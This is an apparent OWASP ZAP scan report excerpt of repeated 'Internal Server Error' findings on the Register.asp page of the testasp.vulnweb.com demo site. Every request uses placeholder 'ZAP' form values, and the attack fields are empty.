HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
